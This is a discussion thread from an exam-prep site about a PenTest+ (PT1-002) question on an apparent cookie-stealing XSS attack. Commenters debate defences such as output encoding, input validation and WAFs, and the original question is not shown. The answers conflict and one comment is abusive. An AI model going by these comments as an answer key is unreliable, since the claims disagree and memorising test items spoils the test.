Exam PT1-002 topic 1 question 22 discussion

Encoding (commonly called “Output Encoding”) involves translating special characters into some different but equivalent form that is no longer dangerous in the target interpreter, for example translating the < character into the &lt; string when writing to an HTML page. Output encoding and input sanitization are the best defenses against XSS. Therefore, I would go for C and E here.

I stick with C and E

This is an example of a Cross-Site Scripting (XSS) attack. To prevent this type of attack, the best methods would be: C. Output encoding: This ensures that any data that is output to the browser is properly encoded, preventing the execution of malicious scripts. E. Input validation: This involves validating and sanitizing user inputs to ensure they do not contain any malicious code. A) A WAF (Web-Application Firewall) could help to prevent XSS attacks, but that's not the definitelly solution, the complete solution is C and E B) Parameterize queries is good for SQL Injection, XSS it's a different scenario D) Session Tokens are good in Session Hijacking Attacks not for XSS (Cross-Site Scripting)

I'm sad that you guys are stupid. A. WAF - this can exactly prevent SQLi and XSS. Don't you understand it name???? B. this is used in SQLi not XSS C. Output encoding - This change malicious character into a plain simple stupid string. This is good pratice! D. Session tokens is useless - XSS still work E. Ambigious. The <script> may come from url parameter instead of form input right???????????????? IT CAN COME FROM DOM XSS! INPUT VALIDATION IS USELSS F. WTF encoding? if it is encode, it can work when decode right????????????

Answer is C & E Cross-site scripting prevention can generally be achieved via two layers of defense: • Encode data on output • Validate input on arrival This was taken from this site: https://portswigger.net/web-security/cross-site-scripting/preventing

C. Output encoding: This involves properly encoding any user-generated or dynamic content that is being outputted on a web page. By encoding the content, special characters are converted into their corresponding HTML entities, preventing them from being interpreted as code by the browser. E. Input validation: It is essential to validate and sanitize any user input received by the web application. Input validation involves checking the input for expected formats, length, and type, and rejecting or sanitizing any input that doesn't meet the specified criteria. This helps to prevent the injection of malicious code into the application.

The code shown is an example of a cross-site scripting (XSS) attack, where the attacker is attempting to steal the user's cookie by injecting a malicious script into a web page

This is an XSS attack. Potentially 3 correct solutions A) WAF C) Output encoding E) Input validation

Parameterized queries is a technique that aims to separate the SQL query from the user input values.

bd correct

It's C and E

C & E, no parameter requested or served in this example so B is not the correct answer.

I believe it should be B and E

Why isn't the answer C and E? (output encoding and input validation). Not sure how parameterized queries helps you here when this is not sql injection (it's xss)